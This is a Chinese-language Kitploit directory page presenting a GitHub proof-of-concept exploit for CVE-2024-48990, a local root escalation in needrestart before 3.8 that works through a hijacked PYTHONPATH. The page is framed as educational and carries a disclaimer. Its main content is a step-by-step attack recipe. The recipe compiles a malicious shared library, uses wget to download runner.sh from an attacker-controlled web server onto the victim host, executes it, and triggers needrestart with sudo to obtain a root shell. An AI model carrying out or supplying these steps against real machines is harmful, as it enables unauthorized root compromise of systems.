Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2024-48990 — 关于 CVE-2024-48990 的 PoC。Qualys 发现,在 3.8 版本之前,needrestart 允许本地攻击者通过诱骗 needrestart 以攻击者控制的 PYTHONPATH 环境变量运行 Python 解释器,从而以 root 身份执行任意代码。(NIST) | Kitploit
工具/GitHubGitHub/grecosamuel/cve-2024-48990
权限提升漏洞分析漏洞利用渗透测试学习与教育
GitHubgrecosamuel/cve-2024-48990

CVE-2024-48990

关于 CVE-2024-48990 的 PoC。Qualys 发现,在 3.8 版本之前,needrestart 允许本地攻击者通过诱骗 needrestart 以攻击者控制的 PYTHONPATH 环境变量运行 Python 解释器,从而以 root 身份执行任意代码。(NIST)

查看仓库
18个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2024-48990

[!WARNING] 这些文件和信息仅供教育目的使用。 作者不对任何恶意行为负责。 所提供的所有信息均无意煽动任何类型的犯罪或滥用行为。

描述

Qualys 发现,3.8 之前的 needrestart 版本允许本地攻击者通过诱使 needrestart 使用攻击者控制的 PYTHONPATH 环境变量运行 Python 解释器,从而以 root 身份执行任意代码。请参阅 NIST 获取官方详细信息。

PoC

  1. 从 git 下载仓库

git clone https://github.com/grecosamuel/CVE-2024-48990.git

  1. 编译 exploit.c 库以生成有效的 ELF 库,并将其命名为 __init__.so

gcc -shared -fPIC -o __init__.so exploit.c

  1. 将 runner.sh 第 7 行和第 10 行中的 <IP> 和 <PORT> 替换为你自己的 Web 服务器的 IP 和端口。
  2. 启动 Web 服务器

python3 -m http.server

  1. 在受害者的机器上下载 runner

wget http://IP:PORT/runner.sh

  1. 为 runner 设置可执行权限

chmod +x runner.sh

  1. 运行脚本

./runner.sh

  1. 使用 sudo 权限运行 needrestart

sudo needrestart

当看到 [*] CVE module created 时,按 CTRL+C 停止进程并获得你的 shell!

下载工具